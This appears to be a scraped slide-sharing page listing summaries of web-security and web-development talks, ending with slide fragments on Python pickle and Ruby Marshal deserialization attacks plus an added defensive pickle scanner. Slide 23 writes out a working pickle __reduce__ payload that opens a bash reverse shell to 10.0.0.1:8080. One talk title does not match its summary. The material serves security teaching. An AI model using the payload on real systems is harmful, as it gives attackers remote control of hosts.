Vlada Kulish shared a really technical topic with us: deserialization, or how one small object can break all your security.
OWASP Ukraine 2017 Security Conference
https://www.facebook.com/events/914991308665427/
This is the short talk I delivered at the Ruby Underground Meetup in Tel Aviv for the local Ruby user group about some of the changes and new features in R
This document provides an overview of Mozilla Web Apps including:
- Web Apps can run on platforms like Windows, Mac, Android and more.
- They are built with open web technologies like HTML5, CSS, and JavaScript.
- A manifest file is needed to define the app and install it using the Mozilla Labs App Runtime extension.
- Web Apps can use features like offline storage, IndexedDB, and fullscreen mode.
The document discusses several techniques for optimizing web page performance including:
1. Using CSS shorthand properties to reduce code and specify font styles concisely.
2. Applying multiple classes to an element to combine styles from different classes.
3. Creating CSS sprites to reduce HTTP requests by combining images into a single file.
4. A few other techniques like cross-browser opacity, text wrapping, and Google web fonts.
1. The document discusses various SQL injection vulnerabilities and techniques for exploiting them, including on Metasploitable, DVWA, and Sqli-labs platforms.
2. It provides examples of payloads to extract database, table, and user information from Sqli-labs lessons 29, 32, 33, and 36.
3. The document also discusses challenges of SQL injection on MySQL databases using GBK encoding, and mitigations like addslashes(), preg_replace(), and mysql_real_escape_string().
This document discusses caching techniques in Rails, including page caching, action caching, and fragment caching. Page caching stores entire static HTML pages to serve cached content quickly without running Rails. Action caching runs controllers but caches output. Fragment caching caches portions of views. Caches can be expired based on model changes or timed expiration. Plugins like cache_fu and sweeper generators help manage caching.
This document discusses using the inherited_resources gem to simplify the implementation of RESTful controllers in Rails applications. It allows controllers to inherit common RESTful actions and configuration. Key features covered include defining resource and collection methods, customizing responses, configuring actions, overwriting actions, and integrating with other libraries like Decent Exposure and Responders.
Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparen... (Priyanka Aash)
When caching servers and load balancers became an integral part of the Internet's infrastructure, vendors introduced what is called "Edge Side Includes" (ESI), a technology allowing malleability in caching systems. This legacy technology, still implemented in nearly all popular HTTP surrogates (caching/load balancing services), is dangerous by design and brings a yet unexplored vector for web-based attacks.
The ESI language consists of a small set of instructions represented by XML tags, served by the backend application server, which are processed on the Edge servers (load balancers, reverse proxies). Due to the upstream-trusting nature of Edge servers, the ESI engine tasked with parsing and executing these instructions is not able to distinguish between ESI instructions legitimately provided by the application server and malicious instructions injected by a malicious party. Through our research, we explored the risks that may be encountered through ESI injection: we identified that ESI can be used to perform SSRF, bypass reflected XSS filters (Chrome), and silently extract cookies. Because this attack vector leverages flaws on Edge servers and not on the client side, the ESI engine can be reliably exploited to steal all cookies, including those protected by the HttpOnly mitigation flag, allowing JavaScript-less session hijacking.
Identified affected vendors include Akamai, Varnish Cache, Squid Proxy, Fastly, IBM WebSphere, Oracle WebLogic, F5, and countless language-specific solutions (NodeJS, Ruby, etc.). This presentation will start by defining ESI and visiting typical infrastructures leveraging this model. We will then delve into the good stuff: identification and exploitation of popular ESI engines, and mitigation recommendations.
Application Diagnosis with Zend Server Tracing (ZendCon)
This document discusses Application Diagnosis with Zend Server Tracing. It provides an overview of debugging applications, introduces Zend Server Tracing as a better way to debug than var_dump, and covers how Zend Server Tracing works including code tracing, monitoring modes, and settings. It provides examples of using code tracing to diagnose uncaught exceptions, destructors, prepared statements, and memory usage. The document encourages using Zend Server Tracing in development, testing, staging, and production environments.
Clearance: Simple, complete Ruby web app authentication (Jason Morrison)
This document discusses Clearance, an authentication gem for Ruby on Rails applications. It provides instructions for installing Clearance and includes code examples for integrating authentication functionality into a Rails model and controllers. It also outlines some future work items like refactoring, documentation, and additional authentication strategies.
This document discusses Magento, an open-source e-commerce platform built on the Zend Framework. It outlines how Magento utilizes around 15 Zend Framework components for functionality like controllers, views, caching, internationalization and databases. It also describes how additional Zend Framework components may be integrated in the future and how modules can extend and overwrite core Magento classes and functionality.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and the kinds of attacks it can be exposed to.
This document contains notes from a meeting on web application security. It discusses several common vulnerabilities like SQL injection, cross-site scripting (XSS), and clickjacking. It provides examples of how these vulnerabilities can occur and ways to prevent them, such as sanitizing user input, enabling CSRF protection middleware, and using the X-Frame-Options header. Keywords discussed include MySQL, Docker, Kubernetes, Ansible, and various attack vectors like CSRF, XSS, SQL injection, and clickjacking. The document aims to educate on security best practices for Python and Django web applications.
Dmitry Chastukhin, Director of security consulting at ERPScan, speaks at Deepsec Conference 2012 on SAP Security.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and the kinds of attacks it can be exposed to.
This document discusses serialization vulnerabilities and provides examples of how deserialization attacks work. It begins with an overview of serialization and why it is important. It then covers different serialization formats like binary, JSON, XML and examples of vulnerabilities in Java, Ruby, PHP, .NET and other languages. Useful links are also provided to learn more about detecting and exploiting serialization vulnerabilities.
Cross Site Scripting (XSS) Defense with Java (Jim Manico)
Cross Site Scripting Defense is difficult. The Java programming language does not provide the native key defenses necessary to thoroughly prevent XSS. As technologies such as Content Security Policy emerge, we still need pragmatic advice to stop XSS in legacy applications as well as in new applications using traditional Java frameworks. First-generation encoding libraries had both performance and completeness problems that prevented developers from achieving thorough, production-safe XSS defense. This talk will deeply review the OWASP Java Encoder Project and the OWASP HTML Sanitizer Project and give detailed code samples highlighting their use. Additional advice on next-generation JavaScript and JSON workflows using the OWASP JSON Sanitizer will also be reviewed.
The document summarizes the OWASP Top 10 security risks and provides prevention techniques. It discusses injection, cross-site scripting (XSS), insecure deserialization, XML external entities (XXE), and other risks. For each risk, it recommends validating, sanitizing, and escaping user input, using prepared statements, and other best practices to prevent security vulnerabilities.
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back (DefconRussia)
This document discusses various techniques for HTTP response splitting and cache poisoning attacks. It provides examples of exploiting HTTP response splitting vulnerabilities to inject additional headers and responses. It also covers ways to poison caches by manipulating headers like Content-Length and Last-Modified to influence caching behavior. The document examines defenses implemented in modern browsers and web servers as well as mitigation techniques. It raises questions about the potential for these attacks to impact other protocols beyond HTTP.
The document is a presentation about HTML5. It discusses what HTML5 is, some of the new elements it introduces like canvas, video, audio, and geolocation. It also covers new features like CSS3 media queries, web fonts using WOFF, and whether HTML5 is ready for use. The presentation encourages trying out HTML5 and provides some resources for learning more.
The document discusses Java servlets and Java Server Pages (JSP). It provides examples of HelloWorld servlets written in Java and JSP. It describes the basic lifecycle of servlets, how they interact with clients, and common tags used in JSP like comments, declarations, expressions and scriptlets. It also demonstrates using Java beans in JSP and an example to look up stock prices that retrieves data from a database using JDBC or alternatively by hardcoding logic based on the stock market source.
TDC2017 | Florianopolis - DevOps Track: How we figured out we had a SRE team ... (tdc-globalcode)
The document discusses the history and evolution of JavaScript packaging and module bundling from 2000 to the present. It covers early approaches using individual script tags to load JS files, the introduction of minification tools like JSMin in 2003, concatenating files together in the late 2000s, module loaders like RequireJS in 2009, the rise of Node.js and package managers in 2010, and the modern dominance of bundlers like Webpack since 2014 which use loaders to bundle dependencies and assets into single files or chunks.
Webpack is a module bundler that packs JavaScript files and their dependencies into small bundles for efficient loading on the browser. It builds a dependency graph by walking through imports and outputs bundles or individual files. Loaders allow transforming assets and piping them together, like using babel-loader to transpile JSX to ES5 and css-loader to bundle CSS. This summarizes the key points about Webpack's purpose, how it builds dependencies, and the role of loaders.
Derek Willian Stavis (Pagar.me)
Everyone says Webpack is just a module bundler. But what is a module? What is a bundler? Why do we need it? We will walk through the history of web development to understand these concepts, and at the end we will dissect Webpack's configuration and output to understand how it works and how it can ease your development process.
Vale do Carbono Conference
Webpack is just a module bundler, they said. What they didn't say is why we need it, and what motivated us to achieve what Webpack has been doing for us. In this talk we will navigate through the years of front-end development, from 2003 to today, to understand this, and in the end we will walk through a complete Webpack project to understand how it works.
XSS Defence with @manicode and @eoinkeary (Eoin Keary)
The document discusses various techniques for preventing cross-site scripting (XSS) attacks, including encoding untrusted data for different contexts, using content security policy (CSP), and jQuery encoding plugins. It provides examples of using encoding libraries like OWASP Encoder to sanitize input for HTML, JavaScript, CSS, and more. It also describes DOM-based XSS defenses, avoiding dangerous jQuery methods, and the structure of CSP violation reports.
My popular talk on Debugging WordPress, presented at WordCamp London, WordCamp Norrkoping, Software University and WPBGUG
Video: http://wordpress.tv/2014/05/23/mario-peshev-debugging-wordpress/
Lecture 4: JavaServer Pages (JSP) & Expression Language (EL) (Fahad Golra)
The document discusses JavaServer Pages (JSP) and the Expression Language (EL) in JEE. It covers key JSP concepts like scripting elements, directive elements, standard action elements, and implicit objects. It also explains the translation of JSP files to servlets, and provides examples of using scripting elements, directives like <jsp:include>, and standard actions.
Whatever it takes - Fixing SQLIA and XSS in the process (guest3379bd)
This document discusses techniques for preventing SQL injection and cross-site scripting (XSS) vulnerabilities. It proposes using prepared statements with separate data and control planes as a "safe query object" approach. It also discusses policy-based sanitization of HTML and focusing code reviews on defect detection through annotating suspicious code regions. The overall goal is to help developers adopt architectures and techniques that thoroughly apply technical solutions to recognize and fix security weaknesses.
Beyond HTML - Scripting languages, frameworks, templating languages and much more (Jens-Christian Fischer)
Everything used to be better - of course! Twenty years ago you could build a web presence with HTML alone; since then, the number of technologies a web developer has to master has multiplied. What is important, and what is not? In this talk Jens-Christian surveys the current zoo of technologies and shows how this diversity can be tamed sensibly.
HTML(5), CSS(3), JavaScript, CoffeeScript, JavaScript frameworks (jQuery, Prototype, Moo, Dojo, Ext, ...), JavaScript microframeworks (Backbone, Ember, Flatiron), templating languages, tools for authoring CSS (SASS, SCSS), responsive design, browser detection, caching, performance tweaks, testing and much more are covered.
This document summarizes Sandro "guly" Zaccarini's presentation on PHP web backdoor obfuscation techniques at EndSummerCamp 2k15. The presentation covers placing backdoors in PHP websites, different methods for executing code through PHP, real world examples of obfuscated backdoors found in the wild, and vulnerabilities that can enable backdoor execution. The goal is to demonstrate how PHP backdoors can be hidden through obfuscation and exploit vulnerabilities.
Brian Hogg - WordCamp: Preparing a plugin for translation (wcto2017)
You have a plugin, but you want users to be able to use it in their native language. Learn how to get it ready for translation, things to watch out for, and tips for maintaining it as you change the plugin over time.
This document discusses a code injection vulnerability in the internationalization (i18n) functionality of the CodeIgniter PHP web framework. Specifically, it shows how an attacker could exploit weaknesses in CodeIgniter's handling of localized language files to perform remote file inclusion (RFI) or local code inclusion attacks. The document provides examples of how an attacker could craft malicious input to include arbitrary files or code from remote or local systems. It also notes that over 240 existing CodeIgniter sites were found potentially vulnerable to this issue. In conclusion, the document invites questions and feedback on this CodeIgniter i18n code injection vulnerability.
The document discusses web applications built with JavaScript. It covers some key benefits of using JavaScript for web apps including speed, ability to use 2D/3D graphics, web audio, and file APIs. It also discusses common JavaScript frameworks and concepts like the DOM, events, asynchronous requests, and testing with Jasmine.
This document summarizes techniques for improving web performance, including:
- Using output caching, compression, browser caching and CDNs to reduce page size and load times
- Optimizing images, CSS, JavaScript and databases for faster loading
- Leveraging caching, minification, concatenation and deferred parsing to improve front-end performance
- Implementing techniques like service workers, resource hints and responsive delivery to optimize the user experience
20. Old:    <Legitimate pickle>…S'<html><body>Foo…'\n
            <Legitimate pickle>
New:    <Legitimate pickle>…S'<html><body>
            <Instruction returning string>…'\n
            <Legitimate pickle>
Result: Identically-typed object to the original, with the new attribute value assigned by the executed instructions
23. import pickle
import socket
import os

class payload(object):
    # pickle calls __reduce__ when serializing; the (callable, args) tuple it
    # returns is stored in the stream, and pickle.loads() invokes that callable
    # with those args when rebuilding the object.
    def __reduce__(self):
        comm = "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"
        return (os.system, (comm,))

# The resulting bytes contain no shell code, only a reference to os.system and
# its argument; the command runs on whichever host deserializes them.
payload = pickle.dumps(payload())
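The defensive counterpart to slides 20 and 23, as an added example that is not part of the original presentation: a scanner built on the standard-library `pickletools` that flags the opcodes a spliced instruction or a `__reduce__` payload needs, and a restricted `Unpickler` whose `find_class` refuses to resolve any callable, so the stream can never reach `os.system`. The `Gadget` class, the `len`-based stand-in payload and the sample dict are constructed for the demo.

```python
import io
import pickle
import pickletools

# Opcodes that make the unpickler import or call something. A pickle of plain
# data (dict, list, str, int) never needs any of them.
CALL_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "BUILD",
                "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def risky_opcodes(data: bytes) -> set:
    """Names of import/call opcodes present in a pickle stream (empty = plain data)."""
    return {op.name for op, _arg, _pos in pickletools.genops(data)} & CALL_OPCODES


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every GLOBAL lookup, so a __reduce__ payload naming
    os.system (or any other callable) fails before anything is invoked."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def safe_loads(data: bytes):
    """Load only data-shaped pickles; reject anything that imports or calls."""
    found = risky_opcodes(data)
    if found:
        raise pickle.UnpicklingError(f"rejected opcodes: {sorted(found)}")
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Gadget:
    # Harmless stand-in for the slide's payload class (constructed for the demo):
    # pickle.loads() will call len("gadget") while "rebuilding" it, exactly the
    # way the original stream would call os.system(comm).
    def __reduce__(self):
        return (len, ("gadget",))


def demo():
    legit = pickle.dumps({"user": "alice", "roles": ["viewer"]})  # constructed sample
    tainted = pickle.dumps(Gadget())
    # Plain pickle.loads runs the embedded call: the result is 6, not a Gadget.
    executed = pickle.loads(tainted)
    try:
        safe_loads(tainted)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return executed, blocked, safe_loads(legit), sorted(risky_opcodes(tainted))


if __name__ == "__main__":
    print(demo())
```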
28. CVE-2013-0156: Ruby on Rails XML processor YAML deserialization code execution
CVE-2017-0903: Unsafe Object Deserialization Vulnerability in RubyGems
29. Ruby on Rails (<4.1 by default) used Marshal.load() on user cookies
<div class="content">
  <%= hidden_field_tag 'user', Base64.encode64(Marshal.dump(@user)) %>
  …
</div>